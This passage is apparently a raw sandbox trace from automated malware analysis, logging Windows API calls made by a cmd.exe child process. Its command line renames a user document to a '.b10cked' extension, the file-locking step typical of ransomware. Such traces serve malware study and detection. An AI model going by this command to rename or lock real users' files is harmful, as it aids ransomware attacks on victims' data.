hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x32, lpOverlapped=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.996] _close (_FileHandle=4) returned 0 [0140.996] FindNextFileW (in: hFindFile=0x370e90, lpFindFileData=0x1ef0a4 | out: lpFindFileData=0x1ef0a4) returned 0 [0140.997] GetLastError () returned 0x12 [0140.997] FindClose (in: hFindFile=0x370e90 | out: hFindFile=0x370e90) returned 1 [0140.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.998] _close (_FileHandle=3) returned 0 [0140.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.999] SetConsoleInputExeNameW () returned 0x1 [0140.999] GetConsoleOutputCP () returned 0x1b5 [0140.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.999] exit (_Code=0) Process: id = "154" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0x12c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14566 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14567 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14568 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14569 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 14570 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14571 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14572 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14573 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14574 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14575 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15952 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15953 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 15954 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 15955 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15957 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15958 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15959 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15960 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15961 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15964 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15967 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15968 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 15969 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 15970 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 15971 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 15972 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 15973 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 210 os_tid = 0x128 [0141.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ff3c | out: lpSystemTimeAsFileTime=0x14ff3c*(dwLowDateTime=0x8e406ac0, dwHighDateTime=0x1d440a9)) [0141.461] GetCurrentProcessId () returned 0x12c [0141.461] GetCurrentThreadId () returned 0x128 [0141.461] GetTickCount () returned 0x2c57f [0141.461] QueryPerformanceCounter (in: lpPerformanceCount=0x14ff34 | out: lpPerformanceCount=0x14ff34*=19825000530) returned 1 [0141.461] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.461] __set_app_type (_Type=0x1) [0141.461] __p__fmode () returned 0x76b331f4 [0141.461] __p__commode () returned 0x76b331fc [0141.461] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.462] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.462] GetCurrentThreadId () returned 0x128 [0141.462] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x128) returned 0x38 [0141.462] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.462] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.462] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fecc | out: phkResult=0x14fecc*=0x0) returned 0x2 [0141.462] VirtualQuery (in: lpAddress=0x14ff03, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.462] GetConsoleOutputCP () returned 0x1b5 [0141.462] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.462] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.463] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.463] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.463] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.463] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.463] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.463] GetEnvironmentStringsW () returned 0x340160* [0141.464] FreeEnvironmentStringsW (penv=0x340160) returned 1 [0141.464] GetEnvironmentStringsW () returned 0x340160* [0141.464] FreeEnvironmentStringsW (penv=0x340160) returned 1 [0141.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee3c | out: phkResult=0x14ee3c*=0x40) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x88, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x0, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegCloseKey (hKey=0x40) returned 0x0 [0141.464] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee3c | out: phkResult=0x14ee3c*=0x40) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x0, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x9, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x9, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x9, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegCloseKey (hKey=0x40) returned 0x0 [0141.465] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.465] srand (_Seed=0x5b886370) [0141.465] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"" [0141.465] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"" [0141.465] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.465] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418c0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.465] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.465] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.465] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.465] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.465] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.465] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.465] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.465] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.465] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.465] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.465] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.465] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.466] GetEnvironmentStringsW () returned 0x3422b0* [0141.466] FreeEnvironmentStringsW (penv=0x3422b0) returned 1 [0141.466] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.466] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.466] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.466] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.466] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.466] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.466] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.466] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.466] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.466] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.466] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fc08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.466] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fc08, lpFilePart=0x14fc04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fc04*="Desktop") returned 0x18 [0141.466] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.466] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f984 | out: lpFindFileData=0x14f984) returned 0x33fff0 [0141.466] FindClose (in: hFindFile=0x33fff0 | out: hFindFile=0x33fff0) returned 1 [0141.466] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f984 | out: lpFindFileData=0x14f984) returned 0x33fff0 [0141.466] FindClose (in: hFindFile=0x33fff0 | out: hFindFile=0x33fff0) returned 1 [0141.466] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f984 | out: lpFindFileData=0x14f984) returned 0x33fff0 [0141.467] FindClose (in: hFindFile=0x33fff0 | out: hFindFile=0x33fff0) returned 1 [0141.467] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.467] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.467] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.467] GetEnvironmentStringsW () returned 0x342ad0* [0141.467] FreeEnvironmentStringsW (penv=0x342ad0) returned 1 [0141.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.467] GetConsoleOutputCP () returned 0x1b5 [0141.467] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.467] GetUserDefaultLCID () returned 0x409 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fd48, cchData=128 | out: lpLCData="0") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fd48, cchData=128 | out: lpLCData="0") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fd48, cchData=128 | out: lpLCData="1") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.468] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.469] GetConsoleTitleW (in: lpConsoleTitle=0x3308c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.469] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.469] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.469] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.469] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.470] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.470] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.470] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.470] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.470] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.470] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.470] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.472] GetConsoleTitleW (in: lpConsoleTitle=0x14fa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.473] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.473] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.473] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.473] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.473] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.473] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.473] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.473] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.473] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.473] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.473] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.473] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.473] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.473] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.473] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.473] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.473] _wcsicmp 